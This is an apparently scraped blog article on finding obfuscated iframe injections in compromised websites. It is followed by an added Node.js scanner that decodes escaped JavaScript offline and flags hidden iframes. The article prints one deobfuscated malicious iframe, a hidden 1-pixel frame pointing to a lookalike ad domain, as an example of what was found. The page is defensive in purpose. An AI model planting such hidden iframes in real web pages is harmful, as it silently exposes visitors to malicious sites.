Information is best in layman's terms

Obfuscated iFrame Injection Attacks – master code professional

<p>I have written several popular articles on iframe injections which you can read by visiting:<br /><br /><a rel="nofollow" onClick="javascript:pageTracker._trackPageview(\’/outgoing/article_exit_link\’);" href="http://websiteprotection.blogspot.com/">http://websiteprotection.blogspot.com</a><br /><br />The people who implemented my suggestions reported they had quite a bit of success in avoiding these malicious iframe injection attacks.  Their websites were now safe and their traffic was continuous.<br /><br />I had a friend who was a victim of these iframe injection attacks.  When I tested his site, all tests indicated that his site was clean, yet I knew this could not be the case.  I checked all his index.* files and could not find any obvious hidden iframes.  What I did notice was some obfuscated code that my friend had no explanation for.<br /><br />Obfuscation is the concealment of meaning in communication, making communication confusing, intentionally ambiguous, and more difficult to interpret. It is basically a form of encryption.   The web page is not really encrypted, or else the web page would not display when accessed.  The web browser can tell the difference between this encrypted code and regular HTML, but the human eye cannot decipher the encrypted code.<br /><br />Upon further investigation, I found that compromised websites can be infected with hidden iframes and/or with obfuscated (escaped) JavaScript code. 
My friend's website appeared to be a victim of this obfuscated iframe injection.<br /><br />The following was the suspected malicious obfuscated iframe injection code:<br /><br />[Script Language='Javascript']<br /><br />[!--<br /><br />[removed](unescape(''));<br />//--&gt;<br />[/Script]<br /><br />Researching the issue further, I found a website that was able to deobfuscate, or decrypt, the code at:<br /><br /><a rel="nofollow" onClick="javascript:pageTracker._trackPageview(\’/outgoing/article_exit_link\’);" href="http://www.novirusthanks.org/javascript-deobfuscator.html">http://www.novirusthanks.org/javascript-deobfuscator.html</a><br /><br />What you do is copy only the obfuscated code as shown below:<br /><br /><br /><br />You then paste the code into the form box they provide and then click on "Deobfuscate".<br /><br />The following was the resulting malicious iframe injection code:<br /><br />[iframe src= http: //goooogleadsence.biz/_click=8F9DA  width=1 height=1 style= visibility:hidden;position:absolute ][/iframe]<br /><br />By completely removing the obfuscated (escaped) JavaScript code, my friend's website was clean and safe again.<br /><br />If you implement my suggestions, particularly the CHMOD 444, after an iframe injection attack, and are fairly sure your website is clean, then chances are you may not be a victim of obfuscated (escaped) JavaScript iframe injection code.  One must not forget though, that no website will ever be 100% secure, which is why we must always practise preventative measures.<br /><br />It is also important to remember that not all iframes are bad.  Before you remove a suspected iframe, make sure it is not relevant to your web page.  You might want to download a copy of the web page before you do any deleting, just to be sure, if you are not certain.</p>
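<p>The deobfuscation step described above can also be done offline, by decoding the escaped string as plain text instead of letting a browser run it. The following Node.js script is an added example, not code from the original article; the sample page, its example.invalid URL, the use of document.write and all function names are constructed for illustration.</p>

```javascript
// Constructed sample: a hidden iframe hex-escaped the way the article describes.
const toHex = s => [...s].map(c => '%' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const SAMPLE_IFRAME = '<iframe src="http://example.invalid/ad" width=1 height=1 ' +
  'style="visibility:hidden;position:absolute"></iframe>';
const SAMPLE_PAGE = "<html><body><p>Welcome</p><script language='Javascript'><!--\n" +
  "document.write(unescape('" + toHex(SAMPLE_IFRAME) + "'));\n//--></script></body></html>";

// Decode %XX and %uXXXX escapes as text; nothing from the page is ever executed.
function decodeEscapes(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Pull the string literal out of every unescape('...') call and decode it.
function findEscapedPayloads(html) {
  const calls = html.matchAll(/unescape\(\s*(['"])([^'"]*)\1\s*\)/gi);
  return [...calls].map(m => decodeEscapes(m[2]));
}

// Report iframes that are 0 or 1 pixel in size or hidden with CSS.
function hiddenIframes(markup) {
  const findings = [];
  for (const [tag] of markup.matchAll(/<iframe\b[^>]*>/gi)) {
    const src = (/src\s*=\s*["']?([^"'\s>]+)/i.exec(tag) || [])[1] || null;
    const tiny = /\b(?:width|height)\s*=\s*["']?[01]\b/i.test(tag);
    const hidden = /visibility\s*:\s*hidden|display\s*:\s*none/i.test(tag);
    if (tiny || hidden) findings.push({ src, tiny, hidden });
  }
  return findings;
}

// Scan page source: decode each escaped payload, then check it for hidden iframes.
function scanPage(html) {
  return findEscapedPayloads(html).flatMap(hiddenIframes);
}

console.log(scanPage(SAMPLE_PAGE));
```

<p>hiddenIframes can also be called directly on the raw page source to catch injected iframes that are not escaped.</p>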